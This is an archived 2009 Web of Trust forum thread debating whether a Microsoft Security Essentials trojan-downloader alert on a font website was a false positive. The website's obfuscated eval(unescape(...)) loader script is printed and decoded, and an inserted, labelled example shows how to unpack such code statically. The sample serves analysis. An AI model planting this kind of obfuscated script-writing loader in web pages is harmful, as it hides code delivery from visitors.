Forum
Comments:
-
- on Mon 16 Nov 2009
- 08:17:38 AM UTC
:(
Sorry to hear that, cyberwitch. You are very lucky that this is your only trojan so far, though! (Of course it's also good that Microsoft Security Essentials blocked it!)
Thank you for the heads up, I have rated the site red, agreed to your comment and placed my own comment on the scorecard.
Just one note, in the future please don't post LIVE malware links. Thanks! :D
-
- on Mon 16 Nov 2009
- 08:27:51 AM UTC
Live link to malware
Sorry about that, noted for next time.
-
- on Mon 16 Nov 2009
- 09:39:39 AM UTC
Should we put this at the top of the forum topic list? Not a whole 123-rule rulebook, but a few important rules like not to post live links? I've e-mailed the developers on the Support page.
-
- on Mon 16 Nov 2009
- 11:49:16 AM UTC
I think you have a false positive. This is the link for the Microsoft Security Essentials page for the pop up you got: http://www.microsoft.com/security/portal/Threat/En...
It is pretty generic. I also checked Google Safe Browsing and Wepawet and they both found nothing.
-
- on Mon 16 Nov 2009
- 04:58:05 PM UTC
if u haven't already u can run ur browser in virtual environment w sandboxie...
http://www.sandboxie.com/
-
- on Mon 16 Nov 2009
- 10:13:30 PM UTC
This is probably the source of the detection
The following code is loaded in a javascript file on that page:
enc.js:
eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b"));
Decoded, that becomes:
eval(function RrRrRrRr(teaabb) {var tttmmm="";l=teaabb.length;www=hhhhffff=Math.round(l/2);if(l<2*www) hhhhffff=hhhhffff-1;for(i=0;i<hhhhffff;i++)tttmmm = tttmmm + teaabb.charAt(i)+ teaabb.charAt(i+hhhhffff);if(l<2*www) tttmmm = tttmmm + teaabb.charAt(l-1);document.write(tttmmm);};)
I leave as an exercise to the reader why a website would go to such lengths to obfuscate code.
I don't believe this is a false positive.
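Added example, not part of the original post: a way to inspect this kind of sample statically, decoding the eval(unescape("...")) layer as text and re-implementing the decoded routine so it returns the rebuilt string instead of passing it to document.write. The function names and the scrambled sample string are constructed for illustration; the percent-encoded prefix is the start of the enc.js blob quoted above.

```javascript
// Added example: static analysis helpers. Nothing here calls eval() or document.write().

// Emulates legacy unescape(): %uXXXX and %XX each become one UTF-16 code unit.
// (decodeURIComponent is not equivalent: it expects UTF-8 and throws on stray bytes.)
function unescapeStatic(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (match, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Pulls the string literal out of eval(unescape("...")) and decodes it as text.
// Returns null when the source does not contain that wrapper.
function peelEvalUnescape(source) {
  const m = /eval\s*\(\s*unescape\s*\(\s*(["'])([^"']*)\1\s*\)\s*\)/.exec(source);
  return m ? unescapeStatic(m[2]) : null;
}

// Same logic as the decoded RrRrRrRr(): the first half of the input holds the
// even-position characters, the second half the odd-position ones, and an
// odd-length input carries its final character unchanged at the end.
function deinterleave(s) {
  const l = s.length;
  const rounded = Math.round(l / 2);
  const isOdd = l < 2 * rounded;
  const half = isOdd ? rounded - 1 : rounded;
  let out = '';
  for (let i = 0; i < half; i++) {
    out += s.charAt(i) + s.charAt(i + half);
  }
  if (isOdd) out += s.charAt(l - 1);
  return out;
}

// Wrapper built from the first bytes of the blob quoted in the post.
const wrapper = 'eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72"));';
// Constructed scrambled input (harmless markup) in the layout the routine expects.
const scrambled = '<>ape/psml<p>';

console.log(peelEvalUnescape(wrapper));
console.log(deinterleave(scrambled));
```

Feeding deinterleave() the actual string arguments found on a page shows what the script would have written into the document, which is the evidence needed to settle a false-positive question.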
-
- on Mon 16 Nov 2009
- 11:49:01 PM UTC
I've seen many video hosting sites do that kind of obfuscation to prevent people from easily downloading videos or hotlinking to the videos. That code does not look all that suspicious.
-
- on Mon 16 Nov 2009
- 11:50:56 PM UTC
Unmask
Parasites finds the code suspicious as well. http://www.unmaskparasites.com/security-report/?pa...
Which I stated on my scorecard comment.
-
- on Tue 17 Nov 2009
- 06:45:24 PM UTC
I've also seen this kind of code a lot
except I usually see it used by sites as a way to obfuscate driveby scripts or shellcode. It might be entirely benign in this instance, but we don't know for sure why it's there.
Could you give me a few examples of video sites that do this? I'm just curious.
I'm willing to bet the signature is based on the escaped hexadecimal for "eval(function" or "document.write" -- if it is, it probably is more overbroad than it should be. But I'm completely guessing here.
-
- on Tue 17 Nov 2009
- 01:20:25 PM UTC
Microsoft security product
Microsoft security product is famous for low F/P....
-
- on Wed 18 Nov 2009
- 11:11:52 PM UTC
MSE also found Trojan on my computer
I just downloaded Microsoft Security Essentials today and I did a full scan of my PC. MSE found Trojan:Win32/Jpgiframe.A on a few of my several wallpapers. I have downloaded them from ewallpapers.eu. Most of these wallpapers are ok, but you never know... So beware of this website and scan your computer frequently with several scanners. I have always used and scanned PC with MBAM, SAS and Avira, but only MSE found these threats. That's not good :(
-
- on Thu 19 Nov 2009
- 01:39:24 AM UTC
re: Trojan:Win32/Jpgiframe.A
I'm curious as to which wallpaper files were detected. Wallpaper name and resolution or better.. the direct URL would be nice. ;-)
ewallpapers.eu is green though there are a few comments about malicious files.
I've just downloaded several wallpapers at different resolutions and all are clean...
-------
WOT Services Ltd. - gives us safety through Web of Trust.
WOT Community - gives us security through unity.
Thank you all
- G7W

My first trojan
I've never had it happen before, but Microsoft Security Essentials detected and removed a javascript file that it identified as "TrojanDownloader:JS/Agent.IH" on a page I was visiting: http:// www rune-fonts co uk/fontlist php (I didn't research other pages on the site). Because I don't really feel qualified to assess this sort of threat, I wanted to mention it on the forums in case the MS software produced a false positive. (The WOT rating of the domain is green but I added a comment and rated trustworthiness in the red). Thanks.